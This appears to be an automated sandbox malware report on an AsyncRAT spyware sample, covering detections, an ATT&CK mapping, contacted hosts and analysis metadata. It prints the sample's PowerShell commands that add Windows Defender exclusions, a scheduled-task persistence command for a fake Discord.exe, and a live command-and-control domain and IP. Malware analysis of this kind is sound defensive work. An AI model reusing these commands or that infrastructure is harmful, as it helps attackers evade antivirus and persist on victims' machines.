                    Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BAEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E764A CheckRemoteDebuggerPresent, 0_2_00007FFD9B7E764A
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Queries volume information: C:\Users\user\Desktop\s3OBQLA3xR.exe VolumeInformation
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BAEE000.00000004.00000020.00020000.00000000.sdmp, s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BB3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: s3OBQLA3xR.exe, type: SAMPLE
Source: Yara match | File source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: s3OBQLA3xR.exe PID: 7352, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: s3OBQLA3xR.exe, type: SAMPLE
Source: Yara match | File source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: s3OBQLA3xR.exe PID: 7352, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic column; the digits preceding a technique name are the count badges shown in the original grid)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 541 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 23 System Information Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph
Behavior Graph ID: 1532616 | Sample: s3OBQLA3xR.exe | Start date: 13/10/2024 | Architecture: WINDOWS | Score: 100

Start node:
• Domains/IPs contacted: methods-availability.gl.at.ply.gg; ip-api.com
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
• Processes started: s3OBQLA3xR.exe; Discord.exe; Discord.exe; 3 other processes

s3OBQLA3xR.exe:
• Network: ip-api.com 208.95.112.1 (ports 49730, 80), TUT-ASUS, United States; methods-availability.gl.at.ply.gg 147.185.221.23 (ports 20557, 49739), SALSGIVERUS, United States
• Dropped file: C:\Users\user\AppData\Roaming\Discord.exe, PE32
• Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 3 other signatures
• Processes started: powershell.exe; powershell.exe; powershell.exe; 2 other processes

Discord.exe:
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

powershell.exe:
• Signatures: Loading BitLocker PowerShell Module
• Processes started: conhost.exe (one per powershell.exe instance; the 2 other processes also each started conhost.exe)
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
s3OBQLA3xR.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
s3OBQLA3xR.exe | 65% | Virustotal | | Browse
s3OBQLA3xR.exe | 100% | Avira | TR/Spy.Gen |
s3OBQLA3xR.exe | 100% | Joe Sandbox ML | |

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Discord.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\Discord.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Discord.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
C:\Users\user\AppData\Roaming\Discord.exe | 65% | Virustotal | | Browse

Unpacked PE Files
No Antivirus matches

Domains
Source | Detection | Scanner | Label | Link
methods-availability.gl.at.ply.gg | 4% | Virustotal | | Browse
ip-api.com | 0% | Virustotal | | Browse

URLs
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
methods-availability.gl.at.ply.gg | 4% | Virustotal | | Browse
https://github.com/Pester/Pester | 1% | Virustotal | | Browse
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
methods-availability.gl.at.ply.gg | 147.185.221.23 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
methods-availability.gl.at.ply.gg | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.microso? | powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.microsK_o | powershell.exe, 00000001.00000002.1792186081.00000239CFA10000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoo | powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | s3OBQLA3xR.exe, 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

Legend (share of contacted IPs per ASN):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Contacted IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
147.185.221.23 | methods-availability.gl.at.ply.gg | United States | | 12087 | SALSGIVERUS | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532616
Start date and time: 2024-10-13 18:51:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: s3OBQLA3xR.exe (renamed because original name is a hash value)
Original Sample Name: 2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@21/21@2/2
                          EGA Information:
                          • Successful, ratio: 10%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 112
                          • Number of non-executed functions: 6
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target Discord.exe, PID 1800 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 6100 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 7560 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 7820 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 7944 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 4996 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7716 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7984 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
